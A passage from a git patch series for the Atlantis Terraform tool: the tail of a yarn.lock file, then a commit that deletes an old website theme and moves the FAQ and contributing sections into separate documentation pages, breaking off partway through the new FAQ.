"https://registry.yarnpkg.com/vue-hot-reload-api/-/vue-hot-reload-api-2.3.0.tgz#97976142405d13d8efae154749e88c4e358cf926" + +vue-loader@^15.2.4: + version "15.2.4" + resolved "https://registry.yarnpkg.com/vue-loader/-/vue-loader-15.2.4.tgz#a7b923123d3cf87230a8ff54a1c16d31a6c5dbb4" + dependencies: + "@vue/component-compiler-utils" "^1.2.1" + hash-sum "^1.0.2" + loader-utils "^1.1.0" + vue-hot-reload-api "^2.3.0" + vue-style-loader "^4.1.0" + +vue-router@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/vue-router/-/vue-router-3.0.1.tgz#d9b05ad9c7420ba0f626d6500d693e60092cc1e9" + +vue-server-renderer@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue-server-renderer/-/vue-server-renderer-2.5.16.tgz#279ef8e37e502a0de3a9ae30758cc04a472eaac0" + dependencies: + chalk "^1.1.3" + hash-sum "^1.0.2" + he "^1.1.0" + lodash.template "^4.4.0" + lodash.uniq "^4.5.0" + resolve "^1.2.0" + serialize-javascript "^1.3.0" + source-map "0.5.6" + +vue-style-loader@^4.1.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/vue-style-loader/-/vue-style-loader-4.1.0.tgz#7588bd778e2c9f8d87bfc3c5a4a039638da7a863" + dependencies: + hash-sum "^1.0.2" + loader-utils "^1.0.2" + +vue-template-compiler@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue-template-compiler/-/vue-template-compiler-2.5.16.tgz#93b48570e56c720cdf3f051cc15287c26fbd04cb" + dependencies: + de-indent "^1.0.2" + he "^1.1.0" + +vue-template-es2015-compiler@^1.6.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/vue-template-es2015-compiler/-/vue-template-es2015-compiler-1.6.0.tgz#dc42697133302ce3017524356a6c61b7b69b4a18" + +vue@^2.5.16: + version "2.5.16" + resolved "https://registry.yarnpkg.com/vue/-/vue-2.5.16.tgz#07edb75e8412aaeed871ebafa99f4672584a0085" + +vuepress-html-webpack-plugin@^3.2.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/vuepress-html-webpack-plugin/-/vuepress-html-webpack-plugin-3.2.0.tgz#219be272ad510faa8750d2d4e70fd028bfd1c16e" + dependencies: + html-minifier "^3.2.3" + loader-utils "^0.2.16" + lodash "^4.17.3" + pretty-error "^2.0.2" + tapable "^1.0.0" + toposort "^1.0.0" + util.promisify "1.0.0" + +vuepress@^0.10.2: + version "0.10.2" + resolved "https://registry.yarnpkg.com/vuepress/-/vuepress-0.10.2.tgz#4f1cd6126619f7a94ab1b08caacdf6d91c52954f" + dependencies: + "@babel/core" "7.0.0-beta.47" + "@vue/babel-preset-app" "3.0.0-beta.11" + autoprefixer "^8.2.0" + babel-loader "8.0.0-beta.3" + cache-loader "^1.2.2" + chalk "^2.3.2" + chokidar "^2.0.3" + commander "^2.15.1" + connect-history-api-fallback "^1.5.0" + copy-webpack-plugin "^4.5.1" + cross-spawn "^6.0.5" + css-loader "^0.28.11" + diacritics "^1.3.0" + docsearch.js "^2.5.2" + escape-html "^1.0.3" + file-loader "^1.1.11" + fs-extra "^5.0.0" + globby "^8.0.1" + gray-matter "^4.0.1" + js-yaml "^3.11.0" + koa-connect "^2.0.1" + koa-mount "^3.0.0" + koa-range "^0.3.0" + koa-static "^4.0.2" + loader-utils "^1.1.0" + lodash.throttle "^4.1.1" + lru-cache "^4.1.2" + markdown-it "^8.4.1" + markdown-it-anchor "^4.0.0" + markdown-it-container "^2.0.0" + markdown-it-emoji "^1.4.0" + markdown-it-table-of-contents "^0.3.3" + mini-css-extract-plugin "^0.4.0" + nprogress "^0.2.0" + optimize-css-assets-webpack-plugin "^4.0.0" + portfinder "^1.0.13" + postcss-loader "^2.1.5" + prismjs "^1.13.0" + register-service-worker "^1.2.0" + semver "^5.5.0" + stylus "^0.54.5" + stylus-loader "^3.0.2" + toml "^2.3.3" + url-loader "^1.0.1" + vue "^2.5.16" + vue-loader "^15.2.4" + vue-router "^3.0.1" + vue-server-renderer "^2.5.16" + vue-template-compiler "^2.5.16" + vuepress-html-webpack-plugin "^3.2.0" + webpack "^4.8.1" + webpack-chain "^4.6.0" + webpack-merge "^4.1.2" + webpack-serve "^1.0.2" + webpackbar "^2.6.1" + workbox-build "^3.1.0" + +watchpack@^1.5.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/watchpack/-/watchpack-1.6.0.tgz#4bc12c2ebe8aa277a71f1d3f14d685c7b446cd00" + dependencies: + chokidar "^2.0.2" + graceful-fs "^4.1.2" + neo-async "^2.5.0" + +webpack-chain@^4.6.0: + version "4.8.0" + resolved "https://registry.yarnpkg.com/webpack-chain/-/webpack-chain-4.8.0.tgz#06fc3dbb9f2707d4c9e899fc6250fbcf2afe6fd1" + dependencies: + deepmerge "^1.5.2" + javascript-stringify "^1.6.0" + +webpack-dev-middleware@^3.0.0: + version "3.1.3" + resolved "https://registry.yarnpkg.com/webpack-dev-middleware/-/webpack-dev-middleware-3.1.3.tgz#8b32aa43da9ae79368c1bf1183f2b6cf5e1f39ed" + dependencies: + loud-rejection "^1.6.0" + memory-fs "~0.4.1" + mime "^2.1.0" + path-is-absolute "^1.0.0" + range-parser "^1.0.3" + url-join "^4.0.0" + webpack-log "^1.0.1" + +webpack-hot-client@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/webpack-hot-client/-/webpack-hot-client-3.0.0.tgz#b714f257a264001275bc1491741685779cde12f2" + dependencies: + json-stringify-safe "^5.0.1" + loglevelnext "^1.0.2" + strip-ansi "^4.0.0" + uuid "^3.1.0" + webpack-log "^1.1.1" + ws "^4.0.0" + +webpack-log@^1.0.1, webpack-log@^1.1.1, webpack-log@^1.1.2: + version "1.2.0" + resolved "https://registry.yarnpkg.com/webpack-log/-/webpack-log-1.2.0.tgz#a4b34cda6b22b518dbb0ab32e567962d5c72a43d" + dependencies: + chalk "^2.1.0" + log-symbols "^2.1.0" + loglevelnext "^1.0.1" + uuid "^3.1.0" + +webpack-merge@^4.1.2: + version "4.1.3" + resolved "https://registry.yarnpkg.com/webpack-merge/-/webpack-merge-4.1.3.tgz#8aaff2108a19c29849bc9ad2a7fd7fce68e87c4a" + dependencies: + lodash "^4.17.5" + +webpack-serve@^1.0.2: + version "1.0.4" + resolved "https://registry.yarnpkg.com/webpack-serve/-/webpack-serve-1.0.4.tgz#d1c83955926969ba195e5032f978da92ef07829c" + dependencies: + "@shellscape/koa-static" "^4.0.4" + "@webpack-contrib/config-loader" "^1.1.1" + chalk "^2.3.0" + clipboardy "^1.2.2" + cosmiconfig "^5.0.2" + debug "^3.1.0" + find-up "^2.1.0" + get-port "^3.2.0" + import-local "^1.0.0" + killable "^1.0.0" + koa "^2.4.1" + koa-webpack "^4.0.0" + lodash "^4.17.5" + loud-rejection "^1.6.0" + meow "^5.0.0" + nanobus "^4.3.1" + opn "^5.1.0" + resolve "^1.6.0" + time-fix-plugin "^2.0.0" + update-notifier "^2.3.0" + url-join "3.0.0" + v8-compile-cache "^2.0.0" + webpack-hot-client "^3.0.0" + webpack-log "^1.1.2" + +webpack-sources@^1.0.1, webpack-sources@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/webpack-sources/-/webpack-sources-1.1.0.tgz#a101ebae59d6507354d71d8013950a3a8b7a5a54" + dependencies: + source-list-map "^2.0.0" + source-map "~0.6.1" + +webpack@^4.8.1: + version "4.12.0" + resolved "https://registry.yarnpkg.com/webpack/-/webpack-4.12.0.tgz#14758e035ae69747f68dd0edf3c5a572a82bdee9" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-module-context" "1.5.12" + "@webassemblyjs/wasm-edit" "1.5.12" + "@webassemblyjs/wasm-opt" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + acorn "^5.6.2" + acorn-dynamic-import "^3.0.0" + ajv "^6.1.0" + ajv-keywords "^3.1.0" + chrome-trace-event "^1.0.0" + enhanced-resolve "^4.0.0" + eslint-scope "^3.7.1" + json-parse-better-errors "^1.0.2" + loader-runner "^2.3.0" + loader-utils "^1.1.0" + memory-fs "~0.4.1" + micromatch "^3.1.8" + mkdirp "~0.5.0" + neo-async "^2.5.0" + node-libs-browser "^2.0.0" + schema-utils "^0.4.4" + tapable "^1.0.0" + uglifyjs-webpack-plugin "^1.2.4" + watchpack "^1.5.0" + webpack-sources "^1.0.1" + +webpackbar@^2.6.1: + version "2.6.1" + resolved "https://registry.yarnpkg.com/webpackbar/-/webpackbar-2.6.1.tgz#d1aff0665c43635ff35672be2f2463d1176bdb6f" + dependencies: + chalk "^2.3.2" + consola "^1.2.0" + figures "^2.0.0" + loader-utils "^1.1.0" + lodash "^4.17.5" + log-update "^2.3.0" + pretty-time "^1.0.0" + schema-utils "^0.4.5" + std-env "^1.3.0" + table "^4.0.3" + +when@~3.6.x: + version "3.6.4" + resolved "https://registry.yarnpkg.com/when/-/when-3.6.4.tgz#473b517ec159e2b85005497a13983f095412e34e" + +whet.extend@~0.9.9: + version "0.9.9" + resolved "https://registry.yarnpkg.com/whet.extend/-/whet.extend-0.9.9.tgz#f877d5bf648c97e5aa542fadc16d6a259b9c11a1" + +which@^1.2.9: + version "1.3.1" + resolved "https://registry.yarnpkg.com/which/-/which-1.3.1.tgz#a45043d54f5805316da8d62f9f50918d3da70b0a" + dependencies: + isexe "^2.0.0" + +wide-align@^1.1.0: + version "1.1.3" + resolved "https://registry.yarnpkg.com/wide-align/-/wide-align-1.1.3.tgz#ae074e6bdc0c14a431e804e624549c633b000457" + dependencies: + string-width "^1.0.2 || 2" + +widest-line@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/widest-line/-/widest-line-2.0.0.tgz#0142a4e8a243f8882c0233aa0e0281aa76152273" + dependencies: + string-width "^2.1.1" + +workbox-background-sync@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-background-sync/-/workbox-background-sync-3.3.0.tgz#87e212715391d2002274f526e77851cfab86ed8a" + dependencies: + workbox-core "^3.3.0" + +workbox-broadcast-cache-update@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-broadcast-cache-update/-/workbox-broadcast-cache-update-3.3.0.tgz#ce4fa56656de5024f567c06f6614e36961c30c0f" + dependencies: + workbox-core "^3.3.0" + +workbox-build@^3.1.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-build/-/workbox-build-3.3.0.tgz#7f3fa9de9714dab318122933b9615a38d94d643d" + dependencies: + babel-runtime "^6.26.0" + common-tags "^1.4.0" + fs-extra "^4.0.2" + glob "^7.1.2" + joi "^11.1.1" + lodash.template "^4.4.0" + pretty-bytes "^4.0.2" + workbox-background-sync "^3.3.0" + workbox-broadcast-cache-update "^3.3.0" + workbox-cache-expiration "^3.3.0" + workbox-cacheable-response "^3.3.0" + workbox-core "^3.3.0" + workbox-google-analytics "^3.3.0" + workbox-precaching "^3.3.0" + workbox-range-requests "^3.3.0" + workbox-routing "^3.3.0" + workbox-strategies "^3.3.0" + workbox-streams "^3.3.0" + workbox-sw "^3.3.0" + +workbox-cache-expiration@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-cache-expiration/-/workbox-cache-expiration-3.3.0.tgz#fe9cfde8e8168fa25ff778c6e2eda54181f58506" + dependencies: + workbox-core "^3.3.0" + +workbox-cacheable-response@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-cacheable-response/-/workbox-cacheable-response-3.3.0.tgz#b7d3904fa30baf7da271d73dd2f0da7518378acf" + dependencies: + workbox-core "^3.3.0" + +workbox-core@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-core/-/workbox-core-3.3.0.tgz#3606223514a85a0935550ed15d973c12b12ff680" + +workbox-google-analytics@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-google-analytics/-/workbox-google-analytics-3.3.0.tgz#380ecefc24040db9e191b2789bced19ad61c8ccb" + dependencies: + workbox-background-sync "^3.3.0" + workbox-core "^3.3.0" + workbox-routing "^3.3.0" + workbox-strategies "^3.3.0" + +workbox-precaching@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-precaching/-/workbox-precaching-3.3.0.tgz#471bbc26bd3e92b24fd9d636842cf3f358302bd2" + dependencies: + workbox-core "^3.3.0" + +workbox-range-requests@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-range-requests/-/workbox-range-requests-3.3.0.tgz#9703cb91e9ea9104ed09c545a87e25f41002ddce" + dependencies: + workbox-core "^3.3.0" + +workbox-routing@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-routing/-/workbox-routing-3.3.0.tgz#8184d0159c8c4e4c9dd7a0da08e28e579e372319" + dependencies: + workbox-core "^3.3.0" + +workbox-strategies@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-strategies/-/workbox-strategies-3.3.0.tgz#0681df07ebf4628454aa91317aa87de2d1ded6c6" + dependencies: + workbox-core "^3.3.0" + +workbox-streams@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-streams/-/workbox-streams-3.3.0.tgz#7591e37a08bf65b32d1db076b86900a8a4b7d02c" + dependencies: + workbox-core "^3.3.0" + +workbox-sw@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/workbox-sw/-/workbox-sw-3.3.0.tgz#1a9fd728951c76b86225b472f9e37088913c9bc4" + +worker-farm@^1.5.2: + version "1.6.0" + resolved "https://registry.yarnpkg.com/worker-farm/-/worker-farm-1.6.0.tgz#aecc405976fab5a95526180846f0dba288f3a4a0" + dependencies: + errno "~0.1.7" + +wrap-ansi@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-3.0.1.tgz#288a04d87eda5c286e060dfe8f135ce8d007f8ba" + dependencies: + string-width "^2.1.1" + strip-ansi "^4.0.0" + +wrappy@1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/wrappy/-/wrappy-1.0.2.tgz#b5243d8f3ec1aa35f1364605bc0d1036e30ab69f" + +write-file-atomic@^2.0.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/write-file-atomic/-/write-file-atomic-2.3.0.tgz#1ff61575c2e2a4e8e510d6fa4e243cce183999ab" + dependencies: + graceful-fs "^4.1.11" + imurmurhash "^0.1.4" + signal-exit "^3.0.2" + +ws@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/ws/-/ws-4.1.0.tgz#a979b5d7d4da68bf54efe0408967c324869a7289" + dependencies: + async-limiter "~1.0.0" + safe-buffer "~5.1.0" + +xdg-basedir@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/xdg-basedir/-/xdg-basedir-3.0.0.tgz#496b2cc109eca8dbacfe2dc72b603c17c5870ad4" + +xtend@^4.0.0, xtend@~4.0.1: + version "4.0.1" + resolved "https://registry.yarnpkg.com/xtend/-/xtend-4.0.1.tgz#a5c6d532be656e23db820efb943a1f04998d63af" + +y18n@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/y18n/-/y18n-4.0.0.tgz#95ef94f85ecc81d007c264e190a120f0a3c8566b" + +yallist@^2.1.2: + version "2.1.2" + resolved "https://registry.yarnpkg.com/yallist/-/yallist-2.1.2.tgz#1c11f9218f076089a47dd512f93c6699a6a81d52" + +yallist@^3.0.0, yallist@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/yallist/-/yallist-3.0.2.tgz#8452b4bb7e83c7c188d8041c1a837c773d6d8bb9" + +yargs-parser@^10.0.0: + version "10.0.0" + resolved "https://registry.yarnpkg.com/yargs-parser/-/yargs-parser-10.0.0.tgz#c737c93de2567657750cb1f2c00be639fd19c994" + dependencies: + camelcase "^4.1.0" From 860cdb866c22d50ae9574053b40ac77aabdf47c6 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 22 Jun 2018 17:27:15 +0100 Subject: [PATCH 46/69] Delete old website --- runatlantis.io/.vuepress/config.js | 2 + runatlantis.io/docs/README.md | 48 - runatlantis.io/docs/contributing.md | 21 + runatlantis.io/docs/faq.md | 28 + website/src/archetypes/default.md | 6 - website/src/archetypes/docs.md | 8 - website/src/config.toml | 22 - website/src/content/_index.md | 6 - website/src/static/.gitkeep | 0 .../src/static/img/atlantis-highquality.png | Bin 21445 -> 0 bytes website/src/static/img/atlantis-logo.png | Bin 21445 -> 0 bytes website/src/static/img/collaborate.png | Bin 13549 -> 0 bytes website/src/static/img/demo-large.gif | Bin 4767847 -> 0 bytes website/src/static/img/demo.gif | Bin 1650880 -> 0 bytes website/src/static/img/locking.png | Bin 15521 -> 0 bytes website/src/static/img/logo-384x384.png | Bin 47594 -> 0 bytes .../static/img/no-need-to-distribute-keys.png | Bin 8889 -> 0 bytes website/src/themes/kube/.gitignore | 1 - website/src/themes/kube/LICENSE.md | 20 - website/src/themes/kube/README.md | 177 -- website/src/themes/kube/archetypes/blog.md | 6 - website/src/themes/kube/archetypes/docs.md | 8 - website/src/themes/kube/layouts/404.html | 12 - .../themes/kube/layouts/_default/baseof.html | 68 - .../themes/kube/layouts/_default/list.html | 18 - .../themes/kube/layouts/_default/single.html | 18 - .../src/themes/kube/layouts/blog/single.html | 58 - .../src/themes/kube/layouts/docs/single.html | 23 - website/src/themes/kube/layouts/index.html | 46 - .../themes/kube/layouts/partials/favicon.html | 1 - .../themes/kube/layouts/partials/footer.html | 26 - .../themes/kube/layouts/partials/header.html | 27 - .../layouts/partials/meta/name-author.html | 6 - .../kube/layouts/partials/meta/ogimage.html | 8 - .../kube/layouts/partials/page-summary.html | 9 - .../kube/layouts/partials/pagination.html | 15 - .../kube/layouts/partials/post/byauthor.html | 20 - .../layouts/partials/post/category-link.html | 1 - .../kube/layouts/partials/post/meta.html | 14 - .../partials/post/related-content.html | 16 - .../kube/layouts/partials/post/tag-link.html | 1 - .../layouts/partials/scripts/animation.html | 127 - .../layouts/partials/site-verification.html | 12 - .../src/themes/kube/layouts/partials/toc.html | 21 - .../src/themes/kube/layouts/section/docs.html | 22 - .../src/themes/kube/layouts/section/faq.html | 16 - website/src/themes/kube/static/css/custom.css | 6 - website/src/themes/kube/static/css/font.css | 68 - .../src/themes/kube/static/css/highlight.css | 1 - website/src/themes/kube/static/css/kube.css | 2156 ---------------- .../src/themes/kube/static/css/kube.demo.css | 404 --- .../themes/kube/static/css/kube.legenda.css | 406 --- .../src/themes/kube/static/css/kube.min.css | 1 - website/src/themes/kube/static/css/master.css | 1132 --------- .../themes/kube/static/font/Lato-Black.woff | Bin 297272 -> 0 bytes .../themes/kube/static/font/Lato-Bold.woff | Bin 328952 -> 0 bytes .../kube/static/font/Lato-BoldItalic.woff | Bin 347092 -> 0 bytes .../themes/kube/static/font/Lato-Italic.woff | Bin 343528 -> 0 bytes .../themes/kube/static/font/Lato-Regular.woff | Bin 323172 -> 0 bytes .../kube/static/font/Lato-Semibold.woff | Bin 326132 -> 0 bytes .../kube/static/img/common/icon-twitter.png | Bin 8496 -> 0 bytes .../themes/kube/static/img/common/logo.png | Bin 1462 -> 0 bytes .../themes/kube/static/img/common/logx2.png | Bin 2384 -> 0 bytes .../kube/static/img/icon-minimalism.png | Bin 1753 -> 0 bytes .../src/themes/kube/static/img/icon-typo.png | Bin 1133 -> 0 bytes .../src/themes/kube/static/img/kube/brand.png | Bin 1848 -> 0 bytes .../kube/static/img/kube/icon-baseline.png | Bin 1024 -> 0 bytes .../kube/static/img/kube/icon-minimalism.png | Bin 1753 -> 0 bytes .../themes/kube/static/img/kube/icon-typo.png | Bin 1133 -> 0 bytes .../kube/static/img/kube/typography/01.png | Bin 44318 -> 0 bytes .../kube/static/img/kube/typography/02.png | Bin 6913 -> 0 bytes .../themes/kube/static/js/jquery-2.1.4.min.js | 5 - website/src/themes/kube/static/js/kube.js | 2201 ----------------- .../src/themes/kube/static/js/kube.legenda.js | 0 website/src/themes/kube/static/js/kube.min.js | 1 - website/src/themes/kube/static/js/master.js | 0 .../src/themes/kube/static/js/tocbot.min.js | 18 - website/src/themes/kube/theme.toml | 31 - 78 files changed, 51 insertions(+), 7317 deletions(-) create mode 100644 runatlantis.io/docs/contributing.md create mode 100644 runatlantis.io/docs/faq.md delete mode 100644 website/src/archetypes/default.md delete mode 100644 website/src/archetypes/docs.md delete mode 100644 website/src/config.toml delete mode 100644 website/src/content/_index.md delete mode 100644 website/src/static/.gitkeep delete mode 100644 website/src/static/img/atlantis-highquality.png delete mode 100644 website/src/static/img/atlantis-logo.png delete mode 100644 website/src/static/img/collaborate.png delete mode 100644 website/src/static/img/demo-large.gif delete mode 100644 website/src/static/img/demo.gif delete mode 100644 website/src/static/img/locking.png delete mode 100644 website/src/static/img/logo-384x384.png delete mode 100644 website/src/static/img/no-need-to-distribute-keys.png delete mode 100644 website/src/themes/kube/.gitignore delete mode 100644 website/src/themes/kube/LICENSE.md delete mode 100644 website/src/themes/kube/README.md delete mode 100644 website/src/themes/kube/archetypes/blog.md delete mode 100644 website/src/themes/kube/archetypes/docs.md delete mode 100644 website/src/themes/kube/layouts/404.html delete mode 100644 website/src/themes/kube/layouts/_default/baseof.html delete mode 100644 website/src/themes/kube/layouts/_default/list.html delete mode 100644 website/src/themes/kube/layouts/_default/single.html delete mode 100644 website/src/themes/kube/layouts/blog/single.html delete mode 100644 website/src/themes/kube/layouts/docs/single.html delete mode 100644 website/src/themes/kube/layouts/index.html delete mode 100644 website/src/themes/kube/layouts/partials/favicon.html delete mode 100644 website/src/themes/kube/layouts/partials/footer.html delete mode 100644 website/src/themes/kube/layouts/partials/header.html delete mode 100644 website/src/themes/kube/layouts/partials/meta/name-author.html delete mode 100644 website/src/themes/kube/layouts/partials/meta/ogimage.html delete mode 100644 website/src/themes/kube/layouts/partials/page-summary.html delete mode 100644 website/src/themes/kube/layouts/partials/pagination.html delete mode 100644 website/src/themes/kube/layouts/partials/post/byauthor.html delete mode 100644 website/src/themes/kube/layouts/partials/post/category-link.html delete mode 100644 website/src/themes/kube/layouts/partials/post/meta.html delete mode 100644 website/src/themes/kube/layouts/partials/post/related-content.html delete mode 100644 website/src/themes/kube/layouts/partials/post/tag-link.html delete mode 100644 website/src/themes/kube/layouts/partials/scripts/animation.html delete mode 100644 website/src/themes/kube/layouts/partials/site-verification.html delete mode 100644 website/src/themes/kube/layouts/partials/toc.html delete mode 100644 website/src/themes/kube/layouts/section/docs.html delete mode 100644 website/src/themes/kube/layouts/section/faq.html delete mode 100644 website/src/themes/kube/static/css/custom.css delete mode 100644 website/src/themes/kube/static/css/font.css delete mode 100644 website/src/themes/kube/static/css/highlight.css delete mode 100644 website/src/themes/kube/static/css/kube.css delete mode 100644 website/src/themes/kube/static/css/kube.demo.css delete mode 100644 website/src/themes/kube/static/css/kube.legenda.css delete mode 100644 website/src/themes/kube/static/css/kube.min.css delete mode 100644 website/src/themes/kube/static/css/master.css delete mode 100644 website/src/themes/kube/static/font/Lato-Black.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Bold.woff delete mode 100644 website/src/themes/kube/static/font/Lato-BoldItalic.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Italic.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Regular.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Semibold.woff delete mode 100644 website/src/themes/kube/static/img/common/icon-twitter.png delete mode 100644 website/src/themes/kube/static/img/common/logo.png delete mode 100644 website/src/themes/kube/static/img/common/logx2.png delete mode 100644 website/src/themes/kube/static/img/icon-minimalism.png delete mode 100644 website/src/themes/kube/static/img/icon-typo.png delete mode 100644 website/src/themes/kube/static/img/kube/brand.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-baseline.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-minimalism.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-typo.png delete mode 100644 website/src/themes/kube/static/img/kube/typography/01.png delete mode 100644 website/src/themes/kube/static/img/kube/typography/02.png delete mode 100644 website/src/themes/kube/static/js/jquery-2.1.4.min.js delete mode 100644 website/src/themes/kube/static/js/kube.js delete mode 100644 website/src/themes/kube/static/js/kube.legenda.js delete mode 100644 website/src/themes/kube/static/js/kube.min.js delete mode 100644 website/src/themes/kube/static/js/master.js delete mode 100644 website/src/themes/kube/static/js/tocbot.min.js delete mode 100644 website/src/themes/kube/theme.toml diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js index 9e2f6a54ed..1b6bd0f4ae 100644 --- a/runatlantis.io/.vuepress/config.js +++ b/runatlantis.io/.vuepress/config.js @@ -33,6 +33,8 @@ module.exports = { '/docs/', '/docs/pull-request-commands', '/docs/deployment', + '/docs/faq', + '/docs/contributing', ], repo: 'runatlantis/atlantis', docsDir: 'runatlantis.io', diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md index ad31df63e6..0762964107 100644 --- a/runatlantis.io/docs/README.md +++ b/runatlantis.io/docs/README.md @@ -352,54 +352,6 @@ We identify a project by its repo **and** the path to the root of the project wi #### Workspace/Environment A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information. -## FAQ -**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?** -A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`. -**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?** - -A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening. - -Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands. - -**Q: How to run Atlantis in high availability mode? Does it need to be?** - -A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running. - -Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently. - -However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway. - -**Q: How to add SSL to Atlantis server?** - -A: First, you'll need to get a public/private key pair to serve over SSL. -These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags. -See `atlantis server --help` for more information. - -**Q: How can I get Atlantis up and running on AWS?** - -A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained. - -## Contributing -Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md). - -## Credits -Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues. - -NOTE: We had to remove the "fork" label because otherwise code searches don't work. - -Thank you to these awesome contributors! -- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs) -- [@nadavshatz](https://github.com/nadavshatz) -- [@jwieringa](https://github.com/jwieringa) -- [@suhussai](https://github.com/suhussai) -- [@mootpt](https://github.com/mootpt) -- [@codec](https://github.com/codec) -- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs) -- [@mpmsimo](https://github.com/mpmsimo) -- [@hussfelt](https://github.com/hussfelt) -- [@psalaberria002](https://github.com/psalaberria002) - -* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com diff --git a/runatlantis.io/docs/contributing.md b/runatlantis.io/docs/contributing.md new file mode 100644 index 0000000000..072886000c --- /dev/null +++ b/runatlantis.io/docs/contributing.md @@ -0,0 +1,21 @@ +# Contributing +Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md). + +## Credits +Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues. + +NOTE: We had to remove the "fork" label because otherwise code searches don't work. + +Thank you to these awesome contributors! +- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs) +- [@nadavshatz](https://github.com/nadavshatz) +- [@jwieringa](https://github.com/jwieringa) +- [@suhussai](https://github.com/suhussai) +- [@mootpt](https://github.com/mootpt) +- [@codec](https://github.com/codec) +- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs) +- [@mpmsimo](https://github.com/mpmsimo) +- [@hussfelt](https://github.com/hussfelt) +- [@psalaberria002](https://github.com/psalaberria002) + +* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com diff --git a/runatlantis.io/docs/faq.md b/runatlantis.io/docs/faq.md new file mode 100644 index 0000000000..379bd74e99 --- /dev/null +++ b/runatlantis.io/docs/faq.md @@ -0,0 +1,28 @@ +# FAQ +**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?** + +A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`. + +**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?** + +A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas 